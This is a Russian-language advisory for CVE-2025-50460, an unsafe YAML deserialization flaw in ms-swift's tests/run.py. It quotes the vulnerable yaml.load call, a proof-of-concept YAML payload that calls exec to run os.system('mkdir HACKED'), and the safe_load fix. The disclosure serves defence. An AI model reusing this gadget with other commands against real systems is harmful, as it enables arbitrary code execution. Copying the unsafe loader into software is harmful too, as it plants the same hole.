
Технические детали и эксплойт для CVE-2025-50460
Статус: Ожидание анализа
Данная запись CVE отмечена для усиления NVD.Уязвимость удаленного выполнения кода (RCE) существует в проекте ms-swift версии 3.3.0 из-за небезопасной десериализации в tests/run.py с использованием yaml.load() из библиотеки PyYAML (версии = 5.3.1). Если злоумышленник может контролировать содержимое YAML-файла конфигурации, переданного параметру --run_config, во время десериализации может быть выполнен произвольный код. Это может привести к полной компрометации системы. Уязвимость срабатывает при загрузке вредоносного YAML-файла, что позволяет выполнять произвольные команды Python, такие как os.system(). Рекомендуется обновить PyYAML до версии 5.4 или выше и использовать yaml.safe_load() для устранения проблемы.
Уязвимость удаленного выполнения кода (RCE) существует в проекте modelscope/ms-swift из-за небезопасного использования yaml.load() в сочетании с уязвимыми версиями библиотеки PyYAML (≤ 5.3.1). Проблема находится в скрипте tests/run.py, где предоставленный пользователем YAML-файл конфигурации десериализуется с помощью yaml.load() и yaml.FullLoader.
Если злоумышленник может контролировать или заменить YAML-файл конфигурации, передаваемый аргументу --run_config, он может внедрить вредоносную нагрузку, приводящую к выполнению произвольного кода.
tests/run.pyif args.run_config is not None and Path(args.run_config).exists():
with open(args.run_config, encoding='utf-8') as f:
run_config = yaml.load(f, Loader=yaml.FullLoader)
exploit.yaml)!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"
import yaml
with open("exploit.yaml", "r") as f:
cfg = yaml.load(f, Loader=yaml.FullLoader)
Это приводит к выполнению os.system, что доказывает выполнение кода.
yaml.load() на yaml.safe_load()# До
yaml.load(f, Loader=yaml.FullLoader)
# После
yaml.safe_load(f)
| Поле | Значение |
|---|---|
| CVE ID | CVE-2025-50460 |
| CVSS Score | TBD |
| CWE | CWE-502: Десериализация недоверенных данных |
| Дата отчета | 2025-04-25 |
| Дата раскрытия | 2025-07-30 |
| Затронутая версия | последняя |
| Версия исправления |